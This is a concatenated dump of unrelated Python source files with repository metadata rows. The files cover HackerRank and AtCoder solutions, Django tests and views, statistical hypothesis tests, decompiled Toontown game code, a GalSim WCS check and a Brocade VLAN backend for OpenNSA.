# target, etime, subset = "12-04-0", "12-03-23", {}
# target, etime, subset = "12-03-0", "12-04-23", {}
# target, etime, subset = "12-02-0", "12-01-23", {}
# target, etime, subset = "12-01-0", "11-30-23", {}
for line in fileinput.input("./tianchi_mobile_recommend_train_item.csv"):
subset[line.split(",")[0]] = True
counts = lines.map(lambda x : extract1(x))\
.groupByKey()\
.map(lambda x : x[0]+"\t"+extract2(x[1]))
output = counts.saveAsTextFile("./competition_tianchi/feature/"+target+"/user/")
| [
"[email protected]"
] | |
479a840a61ac23a2b6d04a1d92edc8556addd410 | f5ca706ea5fd000ebdd230b4c828d98540009b85 | /Problem Solving/Strings/Funny String.py | 14b5568074ebb390445b514074806155920e1755 | [] | no_license | xtanmaygarg/HackerRankSolutions | a6fc72dcd165197c268d28d3f41bd022b5983b8b | ce973b9b1f90e7e39092ecc988333904afb0cda5 | refs/heads/master | 2021-01-01T08:57:24.586457 | 2020-07-12T21:04:57 | 2020-07-12T21:04:57 | 239,206,459 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 801 | py | #!/bin/python3
import math
import os
import random
import re
import sys
# Complete the funnyString function below.
def funnyString(s):
t = s[::-1]
s = list(s)
t = list(t)
sl = []
tl = []
fl = []
gl = []
for i in s:
sl.append(ord(i))
for i in t:
tl.append(ord(i))
for i in range(0,len(sl)-1):
fl.append(abs(sl[i+1] - sl[i]))
for i in range(0,len(tl)-1):
gl.append(abs(tl[i+1] - tl[i]))
#print(gl)
print(fl)
if fl == gl:
return "Funny"
else:
return "Not Funny"
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
q = int(input())
for q_itr in range(q):
s = input()
result = funnyString(s)
fptr.write(result + '\n')
fptr.close()
| [
"[email protected]"
] | |
484bf5dda2028166bea56ebc6a0cb7774075e627 | b3d52ed0675b464881312526a3b55a9ab4c0e6d8 | /hello_exercise/manage.py | fcdf8057cb0121a939222de5acf21e0ac8b11023 | [] | no_license | Alchemy2011/django_rest_framework20171030 | 339117f681a26c31cd80245ce80c0e1816e6c12d | fdc88412faf8d27ddaaa05bef611cfd235bee54e | refs/heads/master | 2021-07-25T21:38:37.706973 | 2017-11-08T14:02:08 | 2017-11-08T14:02:08 | 108,797,561 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 812 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "hello_exercise.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| [
"[email protected]"
] | |
48ff9ba9d3dbeab6f4e525a151aa67190e43cc72 | ad13583673551857615498b9605d9dcab63bb2c3 | /output/instances/nistData/atomic/double/Schema+Instance/NISTXML-SV-IV-atomic-double-enumeration-2-3.py | 9d0ef3892cc0f445eb1ee3592e91bca8ebbf63df | [
"MIT"
] | permissive | tefra/xsdata-w3c-tests | 397180205a735b06170aa188f1f39451d2089815 | 081d0908382a0e0b29c8ee9caca6f1c0e36dd6db | refs/heads/main | 2023-08-03T04:25:37.841917 | 2023-07-29T17:10:13 | 2023-07-30T12:11:13 | 239,622,251 | 2 | 0 | MIT | 2023-07-25T14:19:04 | 2020-02-10T21:59:47 | Python | UTF-8 | Python | false | false | 534 | py | from output.models.nist_data.atomic.double.schema_instance.nistschema_sv_iv_atomic_double_enumeration_2_xsd.nistschema_sv_iv_atomic_double_enumeration_2 import NistschemaSvIvAtomicDoubleEnumeration2
from output.models.nist_data.atomic.double.schema_instance.nistschema_sv_iv_atomic_double_enumeration_2_xsd.nistschema_sv_iv_atomic_double_enumeration_2 import NistschemaSvIvAtomicDoubleEnumeration2Type
obj = NistschemaSvIvAtomicDoubleEnumeration2(
value=NistschemaSvIvAtomicDoubleEnumeration2Type.VALUE_2_7311892445441031_E36
)
| [
"[email protected]"
] | |
ff2cada24b0e31d5d867122eea1da07532fd6a5a | c5347d37f7d8018c2e6161de265ed5ced7deab51 | /budget/tests/test_views.py | 192c634a250860c534d8ef233e33ce3c6a002e91 | [
"MIT"
] | permissive | davidlares/budget-webapp-django-testing | db3f1d5f6f90ccc357271cbe02becf31d4d38355 | 330039ba8a34e14afc96050a5cb9494380edbe84 | refs/heads/master | 2022-01-12T15:50:53.638288 | 2019-05-10T14:27:05 | 2019-05-10T14:27:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,607 | py | from django.test import TestCase, Client
from django.urls import reverse
from budget.models import Project, Category, Expense
import json
class TestViews(TestCase):
# runs before any test here
def setUp(self):
self.client = Client() # creating a client
self.list_url = reverse('list')
self.detail_url = reverse('detail', args=['desktop-app'])
# creating a object for getting the slug correctly (override save method)
self.desktopapp = Project.objects.create(
name = "Desktop app",
budget = 10000
)
# GET methods
def test_project_list_get(self):
response = self.client.get(self.list_url) # setting up the client
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, 'budget/project-list.html')
def test_project_detail_get(self):
response = self.client.get(self.detail_url) # setting up the client
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, 'budget/project-detail.html')
# POST methods
def test_project_detail_POST_new_expense(self):
Category.objects.create (
project = self.desktopapp,
name = 'development'
)
response = self.client.post(self.detail_url, {
'title': 'expense1',
'amount': 1000,
'category': 'development'
})
# because the view redirection
self.assertEquals(response.status_code, 302)
# getting the project
self.assertEquals(self.desktopapp.expenses.first().title, 'expense1')
#empty
def test_project_detail_post_no_data(self):
response = self.client.post(self.detail_url)
# because the view redirection
self.assertEquals(response.status_code, 302)
# getting the project
self.assertEquals(self.desktopapp.expenses.count(), 0)
# DELETE methods
def test_project_detail_delete_expense(self):
category1 = Category.objects.create (
project = self.desktopapp,
name = 'development'
)
Expense.objects.create(
project = self.desktopapp,
title = 'expense1',
amount = 1000,
category = category1
)
response = self.client.delete(self.detail_url, json.dumps({
'id': 1
# the created expense ID
}))
# intensional broken = should be 302
self.assertEquals(response.status_code, 204)
self.assertEquals(self.desktopapp.expenses.count(), 0)
| [
"="
] | = |
39880a9d9db55971218551a7facfbd7b50fc34e2 | 2e5936c3877e96d39f52045a403b658be41b2e1e | /meanmax/stats/test.py | 5debe41403987fe96ba9687a5b7bddd067501f6a | [
"MIT"
] | permissive | castorini/meanmax | 32b71c36b39a30107ae288ba9ae815d630c1b4db | 0ea124105eda04a00677c077b591a94c2e2b2936 | refs/heads/master | 2022-05-17T03:31:00.320904 | 2020-04-29T02:27:15 | 2020-04-29T02:27:15 | 258,859,401 | 11 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,951 | py | from dataclasses import dataclass, field
from typing import Any, Dict
from scipy import stats
import numpy as np
from .estimator import QuantileEstimator
from .utils import compute_pr_x_ge_y
from .tables import MANN_WHITNEY_UP010
@dataclass(frozen=True)
class TwoSampleHypothesisTest(object):
options: Dict[str, Any] = field(default_factory=dict)
@property
def name(self):
raise NotImplementedError
def __hash__(self):
return hash(self.name)
def __eq__(self, other):
return self.name == other.name
def test(self, sample1: np.ndarray, sample2: np.ndarray, alpha=0.05):
raise NotImplementedError
@dataclass(frozen=True)
class StudentsTTest(TwoSampleHypothesisTest):
@property
def name(self):
if not self.options.get('equal_var'):
return 'Welch\'s t-test'
else:
return 't-test'
def test(self, sample1: np.ndarray, sample2: np.ndarray, alpha=0.05):
t, p = stats.ttest_ind(sample1, sample2, **self.options)
return p / 2 < alpha and t < 0, t, p
@dataclass(frozen=True)
class SDBootstrapTest(TwoSampleHypothesisTest):
@property
def name(self):
return 'Stochastic Dominance Bootstrap'
def test(self, sample1: np.ndarray, sample2: np.ndarray, alpha=0.05):
iters = self.options.get('iters', 1000)
gt = compute_pr_x_ge_y(sample1, sample2)
sample = np.concatenate((sample1, sample2))
n = len(sample1)
stats = []
for _ in range(iters):
np.random.shuffle(sample)
sample1 = sample[:n]
sample2 = sample[n:]
stats.append(compute_pr_x_ge_y(sample1, sample2))
p = np.mean(np.array(stats) <= gt)
return p < alpha, p, p
@dataclass(frozen=True)
class MannWhitneyUTest(TwoSampleHypothesisTest):
@property
def name(self):
return 'Mann-Whitney U test'
def __post_init__(self):
if 'alternative' not in self.options:
self.options['alternative'] = 'less'
def exact_test(self, s1, s2):
s1 = [(x, 0) for x in s1]
s2 = [(x, 1) for x in s2]
n = len(s1)
m = len(s2)
s = sorted(s1 + s2)
ranksum1 = 0
ranksum2 = 0
tmp_ranksum = 0
n_ranksum = 0
counts = [0, 0]
last_x = -1000000
for rank, (x, l) in enumerate(s):
if x != last_x and n_ranksum > 0:
ranksum1 += (tmp_ranksum / n_ranksum) * counts[0]
ranksum2 += (tmp_ranksum / n_ranksum) * counts[1]
tmp_ranksum = 0
n_ranksum = 0
counts = [0, 0]
counts[l] += 1
tmp_ranksum += rank + 1
n_ranksum += 1
last_x = x
if n_ranksum > 0:
ranksum1 += (tmp_ranksum / n_ranksum) * counts[0]
ranksum2 += (tmp_ranksum / n_ranksum) * counts[1]
U1 = (n * m) + (n * (n + 1)) / 2 - ranksum1
U2 = (n * m) + (m * (m + 1)) / 2 - ranksum2
U = min(U1, U2)
return U, 0.05 if U <= MANN_WHITNEY_UP010[n - 1][m - 1] and ranksum1 < ranksum2 else 0.051
def test(self, sample1: np.ndarray, sample2: np.ndarray, alpha=0.05):
if len(sample1) <= 20 or len(sample2) <= 20:
U, p = self.exact_test(sample1, sample2)
else:
U, p = stats.mannwhitneyu(sample1, sample2, **self.options)
return p <= alpha, U, p
@dataclass(frozen=True)
class QuantileTest(TwoSampleHypothesisTest):
def __post_init__(self):
if 'quantile' not in self.options:
self.options['quantile'] = 0.5
if 'bootstrap_samples' not in self.options:
self.options['bootstrap_samples'] = 2000
if 'estimate_method' not in self.options:
self.options['estimate_method'] = 'harrelldavis'
if 'alternative' not in self.options:
self.options['alternative'] = 'less'
@property
def name(self):
if self.options['estimate_method'] == 'harrelldavis':
return 'Harrell-Davis quantile test'
if self.options['estimate_method'] == 'direct':
return 'Direct quantile test'
def test(self, sample1: np.ndarray, sample2: np.ndarray, alpha=0.05):
test = QuantileEstimator(dict(estimate_method=self.options['estimate_method'],
quantile=self.options['quantile']))
dstar_arr = []
b = self.options['bootstrap_samples']
for _ in range(b):
sx = test.estimate_point(np.random.choice(sample1, len(sample1)))
sy = test.estimate_point(np.random.choice(sample2, len(sample2)))
dstar_arr.append(sx - sy)
dstar_arr = np.array(dstar_arr)
pstar = (sum(dstar_arr < 0) + 0.5 * sum(dstar_arr == 0)) / b
if self.options['alternative'] == 'less':
p = 1 - pstar
elif self.options['alternative'] == 'both':
p = 2 * min(pstar, 1 - pstar)
else: # greater
p = pstar
return p < alpha, pstar, p
@dataclass(frozen=True)
class ASDTest(TwoSampleHypothesisTest):
@property
def name(self):
return 'Almost Stochastic Dominance test'
def test(self, sample1: np.ndarray, sample2: np.ndarray, alpha=0.05):
tmp = sample2
sample2 = sample1
sample1 = tmp
phi = stats.norm.ppf(alpha)
epsilons = []
n = len(sample1)
m = len(sample2)
c = np.sqrt(n * m / (n + m))
eps_fn = lambda x, y: 1 - compute_pr_x_ge_y(x, y)
eps_orig = eps_fn(sample1, sample2)
for _ in range(1000):
bs1 = np.random.choice(sample1, n)
bs2 = np.random.choice(sample2, m)
epsilons.append(c * (eps_fn(bs1, bs2) - eps_orig))
min_eps = eps_orig - (1 / c) * np.std(epsilons) * phi
return min_eps < self.options.get('threshold', 0.5), min_eps, alpha
| [
"[email protected]"
] | |
2a1f653f3c6aa17decf8fe6281e94268b31d7d45 | 588f4991cad99f517ca5028e0e41c5b4d5252543 | /contest/abc146/A.py | 6dd0b6d5935a91706c75eddb86e2fa19ed8bb293 | [
"MIT"
] | permissive | mola1129/atcoder | 3002ff38cabf0ccb5142bd576ed90419fccde02e | 1d3b18cb92d0ba18c41172f49bfcd0dd8d29f9db | refs/heads/master | 2020-06-16T12:24:49.609707 | 2020-03-14T15:58:42 | 2020-03-14T15:58:42 | 195,571,664 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 144 | py | s = input()
week = ['SUN', 'MON', 'TUE', 'WED', 'THU', 'FRI', 'SAT']
for i in range(7):
if s == week[i]:
print(7 - i)
break
| [
"[email protected]"
] | |
e87eb74666e87fd06b949a6ae8bb772a467b3364 | ba0cbdae81c171bd4be7b12c0594de72bd6d625a | /MyToontown/py2/toontown/cogdominium/CogdoFlyingLevelQuadrant.pyc.py | cc4db2f44140d0abe915edf689c163e5055699a6 | [] | no_license | sweep41/Toontown-2016 | 65985f198fa32a832e762fa9c59e59606d6a40a3 | 7732fb2c27001264e6dd652c057b3dc41f9c8a7d | refs/heads/master | 2021-01-23T16:04:45.264205 | 2017-06-04T02:47:34 | 2017-06-04T02:47:34 | 93,279,679 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,537 | py | # 2013.08.22 22:17:38 Pacific Daylight Time
# Embedded file name: toontown.cogdominium.CogdoFlyingLevelQuadrant
import math
from direct.directutil import Mopath
from pandac.PandaModules import NodePath, Point3, Vec4
from CogdoFlyingObjects import CogdoFlyingPlatform
import CogdoFlyingGameGlobals as Globals
class CogdoFlyingLevelQuadrant():
__module__ = __name__
notify = directNotify.newCategory('CogdoFlyingLevelQuadrant')
def __init__(self, serialNum, model, level, parent):
self.serialNum = serialNum
self._model = model
self._level = level
self._root = NodePath('Quadrant' + `serialNum`)
self._model.reparentTo(self._root)
self._root.reparentTo(parent)
self._visible = True
self.platforms = {}
self.gatherables = []
self.obstacles = []
self._playing = False
self._obstaclesRoot = NodePath('obstacles')
self._obstaclesRoot.reparentTo(self._root)
self._initObstacles(self._obstaclesRoot)
self._gatherablesRoot = NodePath('gatherables')
self._gatherablesRoot.reparentTo(self._root)
self._initGatherables(self._gatherablesRoot)
self._platformsRoot = NodePath('platforms')
self._platformsRoot.reparentTo(self._model)
self._initPlatforms(self._platformsRoot)
self._optimize()
self.place()
def _optimize(self):
lightCones = NodePath('lightCones')
for np in self._platformsRoot.findAllMatches('**/*lightCone*'):
np.wrtReparentTo(lightCones)
lightCones.reparentTo(self._model)
node = self._model.find('**/ducts')
if not node.isEmpty():
node.flattenStrong()
for np in node.getChildren():
np.wrtReparentTo(self._model)
node = self._model.find('**/nests')
if not node.isEmpty():
for np in node.getChildren():
np.flattenStrong()
np.wrtReparentTo(self._model)
for np in self._model.findAllMatches('**/*LayerStack*'):
np.wrtReparentTo(self._model)
for np in self._model.find('**/static').getChildren():
np.wrtReparentTo(self._model)
self._model.flattenMedium()
def _initPlatforms(self, parent):
platformModels = self._model.findAllMatches('**/%s' % Globals.Level.PlatformName)
for platformModel in platformModels:
platform = CogdoFlyingPlatform(platformModel, parent=parent)
self.platforms[platform.getName()] = platform
def _destroyPlatforms(self):
for platform in self.platforms.values():
platform.destroy()
del self.platforms
def _initGatherables(self, parent):
self.generateGatherables(self._model, parent=parent)
if Globals.Level.SpawnLaffPowerupsInNests:
self.generateNestPowerups(self._model, parent=parent)
def generateNestPowerups(self, gatherableModel, parent):
nests = gatherableModel.findAllMatches('**/%s;+s' % Globals.Level.LegalEagleNestName)
for nest in nests:
offset = Globals.Level.LaffPowerupNestOffset
pickup = self._level.gatherableFactory.createPowerup(Globals.Level.GatherableTypes.LaffPowerup)
pickup.reparentTo(parent)
pickup.setPos(parent, nest.getPos(parent) + offset)
if Globals.Level.AddSparkleToPowerups:
sparkles = self._level.gatherableFactory.createSparkles(Vec4(1, 1, 1, 1), Vec4(1, 1, 0, 1), 10.0)
sparkles.reparentTo(pickup)
sparkles.setPos(0, 0, 1)
sparkles.start()
self.gatherables.append(pickup)
def generateGatherables(self, gatherableModel, parent = None, spread = Globals.Level.GatherablesDefaultSpread):
parent = parent or self._root
mopath = Mopath.Mopath(name='gatherables')
def generateMemos():
gatherPaths = gatherableModel.findAllMatches('**/%s' % Globals.Level.GatherablesPathName)
for gatherPath in gatherPaths:
mopath.loadNodePath(gatherPath)
t = 0.0
while t < mopath.getMaxT():
pickup = self._level.gatherableFactory.createMemo()
pickup.reparentTo(parent)
mopath.goTo(pickup, t)
self.gatherables.append(pickup)
t += spread
gatherPath.removeNode()
angleSpread = 360.0 / Globals.Level.NumMemosInRing
gatherPaths = gatherableModel.findAllMatches('**/%s' % Globals.Level.GatherablesRingName)
for gatherPath in gatherPaths:
mopath.loadNodePath(gatherPath)
t = 0.0
while t < mopath.getMaxT():
angle = 0
r = 3
while angle < 360.0:
pickup = self._level.gatherableFactory.createMemo()
pickup.reparentTo(parent)
mopath.goTo(pickup, t)
pickup.setX(parent, pickup.getX() + r * math.cos(math.radians(angle)))
pickup.setZ(parent, pickup.getZ() + r * math.sin(math.radians(angle)))
self.gatherables.append(pickup)
angle += angleSpread
t += spread + 0.5
gatherPath.removeNode()
def generatePropellers():
gatherables = gatherableModel.findAllMatches('**/%s' % Globals.Level.PropellerName)
for gatherable in gatherables:
pickup = self._level.gatherableFactory.createPropeller()
pickup.reparentTo(gatherable.getParent())
pickup.setPos(parent, gatherable.getPos(parent))
self.gatherables.append(pickup)
gatherable.removeNode()
def generatePowerUps():
for powerupType, locName in Globals.Level.PowerupType2Loc.iteritems():
if powerupType == Globals.Level.GatherableTypes.LaffPowerup and Globals.Level.IgnoreLaffPowerups:
continue
gatherables = gatherableModel.findAllMatches('**/%s' % locName)
for gatherable in gatherables:
pickup = self._level.gatherableFactory.createPowerup(powerupType)
pickup.reparentTo(parent)
pickup.setPos(parent, gatherable.getPos(parent))
if Globals.Level.AddSparkleToPowerups:
sparkles = self._level.gatherableFactory.createSparkles(Vec4(1, 1, 1, 1), Vec4(1, 1, 0, 1), 10.0)
sparkles.reparentTo(pickup)
sparkles.setPos(0, 0, 1)
sparkles.start()
self.gatherables.append(pickup)
gatherable.removeNode()
generateMemos()
generatePropellers()
generatePowerUps()
def _initObstacles(self, parent):
def initWhirlwinds():
obstacles = self._root.findAllMatches('**/%s' % Globals.Level.WhirlwindName)
for obstacleLoc in obstacles:
motionPath = self._model.find('**/%s%s' % (obstacleLoc.getName(), Globals.Level.WhirlwindPathName))
if motionPath.isEmpty():
motionPath = None
obstacle = self._level.obstacleFactory.createWhirlwind(motionPath=motionPath)
obstacle.model.reparentTo(parent)
obstacle.model.setPos(parent, obstacleLoc.getPos(parent))
self.obstacles.append(obstacle)
obstacleLoc.removeNode()
return
def initStreamers():
obstacles = self._model.findAllMatches('**/%s' % Globals.Level.StreamerName)
for obstacleLoc in obstacles:
obstacle = self._level.obstacleFactory.createFan()
obstacle.model.reparentTo(parent)
obstacle.model.setPos(parent, obstacleLoc.getPos(parent))
obstacle.model.setHpr(parent, obstacleLoc.getHpr(parent))
obstacle.model.setScale(parent, obstacleLoc.getScale(parent))
obstacle.setBlowDirection()
if Globals.Level.AddParticlesToStreamers:
particles = self._level.obstacleFactory.createStreamerParticles(Vec4(1, 1, 1, 1), Vec4(1, 1, 1, 1), 10.0)
particles.reparentTo(obstacle.model)
particles.start()
self.obstacles.append(obstacle)
obstacleLoc.removeNode()
def initWalkingMinions():
motionPaths = self._model.findAllMatches('**/%s' % Globals.Level.MinionWalkingPathName)
for motionPath in motionPaths:
obstacle = self._level.obstacleFactory.createWalkingMinion(motionPath=motionPath)
obstacle.model.reparentTo(parent)
obstacle.model.setPos(parent, motionPath.getPos(parent))
self.obstacles.append(obstacle)
def initFlyingMinions():
motionPaths = self._model.findAllMatches('**/%s' % Globals.Level.MinionFlyingPathName)
for motionPath in motionPaths:
obstacle = self._level.obstacleFactory.createFlyingMinion(motionPath=motionPath)
obstacle.model.reparentTo(parent)
obstacle.model.setPos(parent, motionPath.getPos(parent))
self.obstacles.append(obstacle)
initWhirlwinds()
initStreamers()
initWalkingMinions()
initFlyingMinions()
def place(self):
self._root.setPos(0, self._level.convertQuadNumToY(self.serialNum), 0)
def destroy(self):
if self._visible:
self.offstage()
self._destroyPlatforms()
for obstacle in self.obstacles:
obstacle.destroy()
for gatherable in self.gatherables:
gatherable.destroy()
self._root.removeNode()
del self._root
del self._gatherablesRoot
del self._obstaclesRoot
del self._platformsRoot
del self._level
def onstage(self, elapsedTime = 0.0):
if self._visible:
return
self._root.unstash()
for obstacle in self.obstacles:
obstacle.startMoving(elapsedTime)
for gatherable in self.gatherables:
gatherable.show()
self._visible = True
def offstage(self):
if not self._visible:
return
self._root.stash()
for obstacle in self.obstacles:
obstacle.stopMoving()
for gatherable in self.gatherables:
gatherable.hide()
self._visible = False
def update(self, dt):
if self._visible:
for gatherable in self.gatherables:
gatherable.update(dt)
for obstacle in self.obstacles:
obstacle.update(dt)
def getModel(self):
return self._root
# okay decompyling C:\Users\Maverick\Documents\Visual Studio 2010\Projects\Unfreezer\py2\toontown\cogdominium\CogdoFlyingLevelQuadrant.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2013.08.22 22:17:38 Pacific Daylight Time
| [
"[email protected]"
] | |
c66f88b67107e67c470860ea50ec688511ea496a | 0010b3d8b8f806d6065e1bb1aa3c18f9714001a7 | /tests/fits_files/check_pyast_sip.py | 6bc939935357f3d53094597d1955dba3e9bf7d27 | [
"BSD-3-Clause",
"BSD-2-Clause",
"LicenseRef-scancode-public-domain"
] | permissive | GalSim-developers/GalSim | bfd2d5e57f20874ad81bc735195c5c62efad63eb | f1c0319600cc713373f1cea7459171fbf388848e | refs/heads/main | 2023-08-17T07:30:44.583679 | 2023-08-15T02:52:00 | 2023-08-15T02:52:00 | 3,510,804 | 194 | 104 | NOASSERTION | 2023-09-12T04:03:38 | 2012-02-22T02:51:45 | Python | UTF-8 | Python | false | false | 2,663 | py | # Copyright (c) 2012-2022 by the GalSim developers team on GitHub
# https://github.com/GalSim-developers
#
# This file is part of GalSim: The modular galaxy image simulation toolkit.
# https://github.com/GalSim-developers/GalSim
#
# GalSim is free software: redistribution and use in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions, and the disclaimer given in the accompanying LICENSE
# file.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the disclaimer given in the documentation
# and/or other materials provided with the distribution.
#
# This script is featured on pyast issue page:
# https://github.com/timj/starlink-pyast/issues/8
# PyAst had been failing to write SIP files correctly, but they fixed this in
# v3.9.0. We override their claim of success regardless, since they aren't
# necessarily accurate enough for our purposes (only accurate to 0.1 pixels).
# Thus, older PyAst versions work correctly in GalSim.
import starlink.Atl as Atl
import starlink.Ast as Ast
import astropy.io.fits as pyfits
import numpy
# http://fits.gsfc.nasa.gov/registry/sip/sipsample.fits
hdu = pyfits.open('sipsample.fits')[0]
fc = Ast.FitsChan(Atl.PyFITSAdapter(hdu))
wcs = fc.read()
# A random test position. The "true" RA, Dec values are taken from ds9.
x = 242
y = 75
true_ra = (13 + 30/60. + 1.474154/3600. - 24.) * numpy.pi / 12.
true_dec = (47 + 12/60. + 51.794474/3600.) * numpy.pi / 180.
ra1, dec1 = wcs.tran( numpy.array([ [x], [y] ]))
print 'Initial read of sipsample.fits:'
print 'error in ra = ',(ra1-true_ra) * 180.*3600./numpy.pi, 'arcsec'
print 'error in dec = ',(dec1-true_dec) * 180.*3600./numpy.pi, 'arcsec'
# Now cycle through writing and reading to a file
hdu2 = pyfits.PrimaryHDU()
fc2 = Ast.FitsChan(None, Atl.PyFITSAdapter(hdu2, clear=False), "Encoding=FITS-WCS")
success = fc2.write(wcs)
print 'success = ',success
if not success:
fc2 = Ast.FitsChan(None, Atl.PyFITSAdapter(hdu2, clear=False))
success = fc2.write(wcs)
print 'Native encoding: success = ',success
fc2.writefits()
hdu2.writeto('test_sip.fits', clobber=True)
hdu3 = pyfits.open('test_sip.fits')[0]
fc3 = Ast.FitsChan(Atl.PyFITSAdapter(hdu3))
wcs3 = fc3.read()
ra3, dec3 = wcs3.tran( numpy.array([ [x], [y] ]))
print 'After write/read round trip through fits file:'
print 'error in ra = ',(ra3-true_ra) * 180.*3600./numpy.pi, 'arcsec'
print 'error in dec = ',(dec3-true_dec) * 180.*3600./numpy.pi, 'arcsec'
| [
"[email protected]"
] | |
59c1f2b45d421f9c798635691acd2b8b721d41ce | 359f3d8a1a2b5524490c314a44d60cec1d06f658 | /whoweb/search/migrations/0016_remove_searchexportpage_limit.py | a6429e3520d3cf0c0d99c344ac8bb8c2cec16767 | [] | no_license | sivasuriyangithub/Merket_Intellect-s3.route | ec9d9aa7d4575d5ff8006e1454f69e4033193fc0 | 71a9ab642f9a31f4a318cebec7fe6a075870a83c | refs/heads/master | 2023-08-25T13:51:02.116705 | 2021-10-19T01:06:49 | 2021-10-19T01:06:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 302 | py | # Generated by Django 2.2.8 on 2020-02-10 02:37
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("search", "0015_auto_20200210_0233"),
]
operations = [
migrations.RemoveField(model_name="searchexportpage", name="limit",),
]
| [
"[email protected]"
] | |
9ab4170d522046aa76f5bf39f8cae94eaa54c710 | dd87109f806b31ddd065b51162e4e3ddc167151f | /select_sqlalchemy.py | 1ef7bac6df4eff93502b857a0cf97d7e3f2c2689 | [] | no_license | articuly/operation_practice | 9776caeb9a039a72d008fc312b1134f7e2c18394 | d4d4452e4174e6b8d7cc834f29452c08f304c719 | refs/heads/master | 2021-05-26T04:03:12.489849 | 2021-01-26T12:24:35 | 2021-01-26T12:24:35 | 254,045,242 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 958 | py | from sqlalchemy import create_engine, Column, Integer, String, Enum
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
# 创建数据库引擎,连接mqsql数据库,用pymysql方式
engine = create_engine('mysql+pymysql://root:123456@localhost/mycms')
# 创建会话对象,根据不同的数据库引擎创建对应的会话对象
Session = sessionmaker(bind=engine)
# 创建会话对象实例
session = Session()
# base为映射基类
Base = declarative_base()
# 数据库表模型的映射
class Users(Base):
__tablename__ = 'users'
user_id = Column(Integer, primary_key=True)
username = Column(String(32))
realname = Column(String(32))
password = Column(String(32))
age = Column(Integer)
city = Column(String(32))
if __name__ == '__main__':
res = session.query(Users, Users.username, Users.realname).filter(Users.username.like("py%")).limit(50).all()
print(res)
| [
"[email protected]"
] | |
3fcd3ecb6a4ec8ef84a4547a9ff3b96cc2bc5142 | 88bd71afeb581578c9c0d29c08b38a9ed1c00ffb | /house/views.py | 7e22d0ac99a0b75f5279554ee7e962e5af0bfc86 | [] | no_license | lopezjronald/DjangoRealEstateInvestmentProject | 019b5c763a5839b920a9abf823c9feb1e9fde0f8 | 6347e2a60e48915333700c182bb4143166cfb8f1 | refs/heads/master | 2022-12-04T18:38:17.609092 | 2020-08-28T00:50:23 | 2020-08-28T00:50:23 | 290,914,869 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 192 | py | from django.shortcuts import render
from .models import Project
def house(request):
projects = Project.objects.all()
return render(request, 'house/home.html', {'projects': projects})
| [
"[email protected]"
] | |
fa284df700e5a99c1ad7f73156e6a6cfb14a4ef6 | c61802907bb274c999a6815a072336de977e65e9 | /opennsa/backends/brocade.py | 2e9860ec78d9b0f606ca23ee5b8ca96a718d3e9f | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | NORDUnet/opennsa | 2f8039fa4702a8126e2e0cdc4bc6b56b4389c494 | 9d47b29037e5f9a159e7984eb17b4d3aeaf1708c | refs/heads/master | 2023-07-22T22:36:44.864169 | 2022-10-06T13:18:08 | 2022-10-06T13:18:08 | 10,215,733 | 16 | 24 | BSD-3-Clause | 2022-10-06T13:08:44 | 2013-05-22T08:50:54 | Python | UTF-8 | Python | false | false | 8,035 | py | """
Brocade backend.
Contributed by Balasubramania Pillai from MAX Gigapop.
Ported to OpenNSA NSIv2 by Henrik Thostrup Jensen (summer 2013)
Further contributions/fixes from Jeronimo Aguiar from AMPATH.
Further contributions by John Hess from CENIC.
Notes:
configure terminal
vlan $vlan_id name $name
tagged $source_port
tagged $dest_port
end
Teardown:
configure terminal
no vlan $vlan_id
end
"""
import string
import random
from twisted.python import log
from twisted.internet import defer
from opennsa import constants as cnt, config
from opennsa.backends.common import ssh, genericbackend
LOG_SYSTEM = 'opennsa.brocade'
COMMAND_PRIVILEGE = 'enable %s'
COMMAND_CONFIGURE = 'configure terminal'
COMMAND_END = 'end'
COMMAND_VLAN = 'vlan %(vlan)i name %(name)s'
#COMMAND_TAGGED = 'tagged %(port)s'
COMMAND_TAGGED = 'tagged ethernet %(port)s'
COMMAND_NO_VLAN = 'no vlan %(vlan)i'
def _portToInterfaceVLAN(nrm_port):
port, vlan = nrm_port.split('.')
vlan = int(vlan)
return port, vlan
def _createSetupCommands(source_nrm_port, dest_nrm_port):
log.msg('_createSetupCommands: src %s dst %s' % (source_nrm_port, dest_nrm_port))
s_port, s_vlan = _portToInterfaceVLAN(source_nrm_port)
d_port, d_vlan = _portToInterfaceVLAN(dest_nrm_port)
assert s_vlan == d_vlan, 'Source and destination VLANs differ, unpossible!'
log.msg('_createSetupCommands: src %s %s dst %s %s' % (s_port, s_vlan, d_port, d_vlan))
name = 'opennsa-%i' % s_vlan
cmd_vlan = COMMAND_VLAN % { 'vlan' : s_vlan, 'name' : name }
cmd_s_intf = COMMAND_TAGGED % { 'port' : s_port }
cmd_d_intf = COMMAND_TAGGED % { 'port' : d_port }
commands = [ cmd_vlan, cmd_s_intf, cmd_d_intf ]
log.msg('_createSetupCommands: commands %s' % (commands))
return commands
def _createTeardownCommands(source_nrm_port, dest_nrm_port):
